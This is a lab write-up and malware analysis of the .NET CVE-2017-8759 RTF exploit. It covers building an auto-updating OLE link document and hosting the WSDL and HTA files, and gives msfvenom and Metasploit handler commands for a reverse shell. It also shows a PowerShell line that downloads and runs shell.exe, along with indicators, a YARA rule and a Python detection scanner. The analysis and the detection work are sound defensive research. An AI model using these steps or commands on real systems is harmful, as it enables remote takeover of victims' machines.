.NET Framework zero day Vulnerability (CVE-2017-8759)

Introduction

This report explains how the public proof of concept for CVE-2017-8759 is turned into a working exploit in a lab. In place of a real malicious payload, a Metasploit reverse-connection payload (shell.exe) is used.

Description

.NET Framework Remote Code Execution Vulnerability.

Microsoft Windows is prone to a remote code-execution vulnerability. Successfully exploiting this issue may allow attackers to execute arbitrary code in the context of the application. Failed exploit attempts will result in denial-of-service conditions.

A remote code execution vulnerability exists when the Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. To exploit the vulnerability, an attacker would first need to convince the user to open a malicious document or application. The security update addresses the vulnerability by correcting how .NET validates untrusted input.

File Details:

Filename: Cve-2017-8759.rtf
Size:     5.6 Kilobytes
MD5:      96d819af7bca99ffb360b5014647a97c
SHA1:     365d0c3518b8836470a5bf74981ba9c0775db26b
SHA256:   97ee741a4361ac7b7c3a773bce31bb08948b5b389571fd9bb631febdf76efa13


Vulnerable Versions

According to Microsoft, the following products are affected:

  • Microsoft .NET Framework 2.0 SP2
  • Microsoft .NET Framework 3.5
  • Microsoft .NET Framework 3.5.1
  • Microsoft .NET Framework 4.5.2
  • Microsoft .NET Framework 4.6
  • Microsoft .NET Framework 4.6.1
  • Microsoft .NET Framework 4.6.2
  • Microsoft .NET Framework 4.7

Attack Process

The attack occurs in the following manner:

  • Create the RTF file, either with the public Python PoC script or by hand (Step 1 below).
  • When the user opens the document, winword.exe issues an HTTP request to the attacker's server to retrieve the WSDL definition (exploit.txt) that the embedded SOAP moniker points to.
  • The .NET WSDL parser turns that definition into C# proxy source and compiles it with csc.exe; the code injected into the WSDL runs during this step and launches mshta.exe with the URL of the hosted HTA file.
  • mshta.exe fetches cmd.hta and executes the script embedded in it.

Exploitation Steps

Step 1: Create the RTF file

First, we create the RTF file. As discussed above, it can be created with the Python PoC script or manually; here the manual route is shown.

Two ingredients are involved: an OLE2 embedded link object in the document, and the remote content that object fetches when it updates (in this setup the WSDL definition exploit.txt, which in turn leads to the HTA file).

To embed an OLE2 link object into a document, open Microsoft Word, click Insert > Object, select Create from File, enter the URL of the remote file as the file name and tick Link to file, as shown in Figure 1.

Figure 1

Save the document as a DOCX, DOC or RTF file; all of these handle OLE2 link objects.

Note that this dialog produces a Word.Document.8 link object (see the \objclass in the fragment below). The objdata of the sample analysed in the Technical details section instead carries the SOAP moniker CLSID pointing at the WSDL definition, which is what reaches the vulnerable parser, so the Python PoC script is the more reliable way to build the file.

If the "Display as Icon" check box is left unticked and the remote file is served with content-type application/rtf or application/doc, the linked content is rendered inline in the document, as shown in Figure 2:

Figure 2

However, user interaction is still required: the user must double-click the "Testing" text shown in Figure 2, or save the file, to make the document connect out, update the linked content and display it.

A document containing an \objupdate control word instead updates the object as soon as it is opened. Take the document created above and modify it in a text editor:

Original:

{\object\objautlink\rsltpict\objw9027\objh450{\*\objclass Word.Document.8}{\*\objdata

Modified (\objupdate inserted directly after \objautlink):

{\object\objautlink\objupdate\rsltpict\objw9027\objh450{\*\objclass Word.Document.8}{\*\objdata

The document with the injected \objupdate control word is shown in Figure 3:

Figure 3


Step 2: Prepare the server (as shown in Figure 4)

  1. Run a web server on port 80 and place exploit.txt (the WSDL definition) and cmd.hta in its document root.
  2. Generate the Metasploit payload and start the handler:

a> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<attacker IP> LPORT=4444 -f exe > /tmp/shell.exe

(Creates the payload, shell.exe, with Metasploit; copy it to the web server root so the HTA can download it.)

b> msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <attacker IP>; set LPORT 4444; run"

(Starts the handler that receives the reverse connection from the target PC; LHOST and LPORT must match the values baked into shell.exe.)

Figure 4

Flow of the exploit:

Word opens test.rtf and the embedded OLE link object, marked with \objupdate, refreshes immediately. Word fetches exploit.txt, a deliberately malformed WSDL definition, over HTTP; the .NET WSDL parser generates C# source from it (Logo.cs) and compiles it with csc.exe, which runs the code injected into the WSDL. That code launches mshta.exe with the URL of cmd.hta on the server, and mshta.exe downloads and executes it.

The HTA file runs a PowerShell command that downloads and executes shell.exe (which makes the reverse connection to the attacker's handler), as shown in Figure 5 and Figure 6.

Figure 5 (Flow of Process)

Figure 6 (HTA script used to download and execute shell.exe)

Technical details

This vulnerability (CVE-2017-8759) is triggered by improper handling of a SOAP WSDL response and leads to remote code execution. Attackers use crafted RTF files to exploit it. The RTF file contains an embedded OLE object whose data consists of the SOAP moniker CLSID and a link to a remotely hosted SOAP WSDL definition file, as shown in Figure 7.

Figure 7 (RTF document with embedded OLE object pointing to the SOAP WSDL definition)

Opening the RTF file now causes the hosted HTA file to run without user interaction, as shown in Figure 8:

Figure 8

In the two documents in which SMA-LAB observed these attacks, the malicious scripts downloaded additional payloads and terminated the original winword.exe process to conceal the user prompt generated by the OLE2link.

The malicious document identified by SMA-LAB has two stages. When the RTF is opened by winword.exe, it requests the malicious SOAP WSDL definition from the compromised website.

The WSDL definition returned in the response is processed by the WSDL parser module, as shown in Figure 9.

Figure 9

Winword.exe makes a request to the DCOMLaunch service, which in turn causes the svchost.exe process hosting DCOMLaunch to execute mshta.exe.

Figure 9 shows the injected code that the WSDL SOAP parser ends up executing: because the parser does not properly validate the definition, the injected code is compiled and run. It then downloads and executes the remotely hosted "cmd.hta" file with the help of mshta.exe. This .hta script is obfuscated; Figure 10 shows the script after de-obfuscation.

Figure 10

As the de-obfuscated script in Figure 10 shows, powershell.exe is executed to download and run the malware "shell.exe" from the compromised website.

The two scripts perform the following malicious actions:

The obfuscated "Logo.cs" source (the C# that the WSDL parser generates from exploit.txt and compiles with csc.exe, carrying the injected code) performs the following actions when executed:

  • Terminates the winword.exe process with taskkill.exe to hide the prompt.
  • Cleans up the Word Resiliency registry keys for Word versions 15.0 and 16.0 so that Microsoft Word restarts normally.
  • Writes an embedded obfuscated script to "Local Settings\Temporary Internet Files\Content.IE5\LVFW6WQJ\cmd.hta".
  • Executes the script.

The obfuscated "cmd.hta" script performs the following actions when executed:

  • Attempts to delete itself from the system.
  • Downloads http[:]//192.168.1[.]19/shell.exe and saves it as %TMP%\shell.exe.
  • Executes %TMP%\shell.exe.

The following suspicious activity was captured by SMA-LAB while the CVE-2017-8759 sample was run in the lab.

System Affected

Files Written by (Process cvtres.exe)
  • c:\WINDOWS\system32\Com\SOAPAssembly\http1001924168414190logo4txt.dll
Files Written by (Process csc.exe)
  • c:\WINDOWS\system32\Com\SOAPAssembly\http1001924168414190logo4txt.dll
  • c:\WINDOWS\system32\Com\SOAPAssembly\CSCD.tmp
  • c:\WINDOWS\system32\Com\SOAPAssembly\http1001924168414190logo4txt.pdb
Files Written by (Process mshta.exe)
  • C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LVFW6WQJ\cmd[1].hta
  • \\?\PIPE\ROUTER
Files Written by (Process WINWORD.EXE)
  • C:\Documents and Settings\Administrator\Application Data\Microsoft\UProof\CUSTOM.DIC
  • C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word\~WRS{47FAD676-59FC-46B6-A517-280E4A3CF27C}.tmp
  • C:\Documents and Settings\Administrator\Local Settings\Temp\5rde1qv3.out
  • C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dotm
  • C:\WINDOWS\system32\Com\SOAPAssembly\Logo.cs
  • \\?\PIPE\lsarpc
  • C:\Documents and Settings\Administrator\Local Settings\Temp\5rde1qv3.cmdline
  • C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word\~WRS{25FC9202-2287-4439-9288-A2C9132790D4}.tmp
  • C:\Documents and Settings\Administrator\Local Settings\Temp\5rde1qv3.0.cs
  • C:\Documents and Settings\Administrator\Local Settings\Temp\~$test.rtf
  • \\?\PIPE\ROUTER
 Registry keys written by (Process mshta.exe)
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CacheLimit
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CacheLimit
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CachePath
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3\CachePath
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CacheLimit
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1\CachePath
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2\CacheLimit
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Paths
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4\CachePath
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MigrateProxy
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\Directory
Mutexes accessed
    • RasPbFile
    • ZonesCacheCounterMutex
    • WininetConnectionMutex
    • MsnSspcPrivatePwdMutex
    • ZonesCounterMutex
    • ZonesLockedCacheCounterMutex
Processes created by (Process csc.exe)
  • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\RESE.tmp"
  • "c:\WINDOWS\system32\Com\SOAPAssembly\CSCD.tmp"
Processes created by (Process mshta.exe)
  • C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://192.168.1.19/shell.exe', 'c:/windows/temp/shell.exe'); c:/windows/temp/shell.exe
Processes created by (Process WINWORD.EXE)
  • "C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Documents and Settings\Administrator\Local Settings\Temp\5rde1qv3.cmdline"
  • C:\WINDOWS\system32\mshta.exe http://192.168.1.19/cmd.hta
  • "C:\Windows\System32\mshta.exe" http://192.168.1.19/cmd.hta

Suspicious Activity Captured in Memory

8 events with 5 signatures were captured in memory. The 5 signatures are:

  • Creates executable on system
  • Creates suspicious process
  • Creates alternate data stream
  • Deletes its original binary from disk
  • Creates a suspicious powershell process

Payload Analysis

Description

Shell.exe is used to make the reverse connection to the attacker's handler, as shown in Figure 11.

Figure 11

Once the shell is obtained, we can gather system information, download files and execute commands on the victim.

For instance, to learn the victim's IP address, type "ipconfig" at the meterpreter prompt, as shown in Figure 12.

Figure 12

The commands that can be executed on the victim PC through meterpreter are shown in Figure 13.

Figure 13

NOTE: An attacker can drop any malicious payload in place of shell.exe on the victim's PC, such as ransomware, a keylogger, a trojan or a worm.

We use the following YARA rule to hunt for these RTF documents (straight quotes are required for the rule to compile; the comments spell out what each string matches):

rule ksig_CVE_2017_8759
{
    meta:
        description = "Malicious RTF file CVE-2017-8759"
        author = "SMA-LAB"
        date = "2018-01-08"

    strings:
        // "{\rt", the start of an RTF header
        $rtf  = { 7B 5C 72 74 }
        // "\objautlink\objupdate": an OLE link object that updates when the document opens
        $obj  = { 5C 6F 62 6A 61 75 74 6C 69 6E 6B 5C 6F 62 6A 75 70 64 61 74 65 }
        // "wsdl=" in UTF-16LE (77 00 73 00 64 00 6c 00 3d 00), written as the hex text
        // RTF uses for \objdata; nocase covers upper- and lower-case hex digits
        $wsdl = "7700730064006c003d00" nocase

    condition:
        all of them
}

Note that $obj only fires when \objupdate directly follows \objautlink, as in the modified fragment from Step 1; a document that places another control word between them (for example \objautlink\rsltpict\objupdate) is missed, so hunt on the individual control words as well when a campaign varies the RTF layout.
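As an added example that is not part of the SMA-LAB report, the following Python scanner applies the same three checks as the YARA rule above, but on each parsed OLE object group rather than on raw bytes, so the order of the control words from Step 1 no longer matters and the hex-encoded \objdata is decoded before the UTF-16LE "wsdl=" marker is looked for. The RTF sample, the WSDL URL inside it and the objdata content are constructed for this example (the objdata is only the text "wsdl=<url>" hex-encoded, not a real OLE stream, and the file is not the Cve-2017-8759.rtf analysed above).

```python
import binascii
import re

# Constructed sample, built for this example: an RTF with one auto-updating OLE
# link object whose hex-encoded \objdata carries "wsdl=<url>" in UTF-16LE.  It is
# not the Cve-2017-8759.rtf analysed above and the objdata is not a real OLE stream.
WSDL_URL = "http://192.168.1.19/exploit.txt"  # lab server address used on this page
OBJDATA_HEX = binascii.hexlify(("wsdl=" + WSDL_URL).encode("utf-16-le")).decode()

SAMPLE_RTF = (
    r"{\rtf1\ansi"
    r"{\object\objautlink\objupdate\rsltpict\objw9027\objh450"
    r"{\*\objclass Word.Document.8}{\*\objdata " + OBJDATA_HEX + "}}"
    r"\par Testing}"
)

# The same object without \objupdate: the "Original" form from Step 1, which only
# refreshes the link when the user double-clicks it.
BENIGN_RTF = SAMPLE_RTF.replace(r"\objupdate", "")

_WSDL_UTF16 = "wsdl=".encode("utf-16-le")  # the bytes the YARA $wsdl string spells out in hex


def rtf_object_groups(rtf: str):
    """Yield every {\\object ...} group, balancing braces from the control word onward."""
    for m in re.finditer(r"\{\\object\b", rtf):
        depth = 0
        for i in range(m.start(), len(rtf)):
            if rtf[i] == "{":
                depth += 1
            elif rtf[i] == "}":
                depth -= 1
                if depth == 0:
                    yield rtf[m.start():i + 1]
                    break


def objdata_bytes(group: str) -> bytes:
    """Decode the hex text that follows \\objdata (RTF stores OLE data as hex digits)."""
    m = re.search(r"\\objdata\s*([0-9A-Fa-f\s]+)", group)
    if not m:
        return b""
    hexstr = re.sub(r"\s+", "", m.group(1))
    return binascii.unhexlify(hexstr[: len(hexstr) & ~1])


def objclass(group: str) -> str:
    m = re.search(r"\\objclass\s+([^}]+)", group)
    return m.group(1).strip() if m else ""


def scan_rtf(rtf: str) -> list:
    """One finding dict per OLE object; 'suspicious' mirrors the YARA rule's condition."""
    if not rtf.startswith("{\\rt"):  # YARA $rtf: "{\rt"
        return []
    findings = []
    for n, group in enumerate(rtf_object_groups(rtf)):
        words = set(re.findall(r"\\([a-z]+)", group))
        auto_update = {"objautlink", "objupdate"} <= words  # YARA $obj, order-independent
        wsdl_ref = _WSDL_UTF16 in objdata_bytes(group)      # YARA $wsdl, after hex decoding
        findings.append({
            "object": n,
            "objclass": objclass(group),
            "auto_update": auto_update,
            "wsdl_in_objdata": wsdl_ref,
            "suspicious": auto_update and wsdl_ref,
        })
    return findings


if __name__ == "__main__":
    for name, doc in (("constructed sample", SAMPLE_RTF), ("without \\objupdate", BENIGN_RTF)):
        print(name, scan_rtf(doc))
```

Because the scanner decodes the objdata it can be extended to check the leading bytes of the OLE stream for a specific CLSID, which is where the SOAP moniker referred to in the Technical details section lives; the YARA rule cannot do that without a second hex-text string for each CLSID byte order.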

Conclusion

As malware actors have already started using this particular Microsoft Office exploit, we expect more malicious campaigns to be built around it. As mentioned earlier, this vulnerability has been patched and security updates are available for it. We strongly recommend that users apply the latest security updates released by Microsoft.

Recommendations

Run all software as a non-privileged user with minimal access rights.

Deploy network intrusion detection systems to monitor network traffic for malicious activity.

Do not accept or execute files from untrusted or unknown sources.

Do not follow links provided by unknown or untrusted sources.

Implement multiple redundant layers of security.

Reference Link

https://support.microsoft.com/en-in/help/4040959/description-of-the-security-only-update-for-the-net-framework-4-5-2-fo
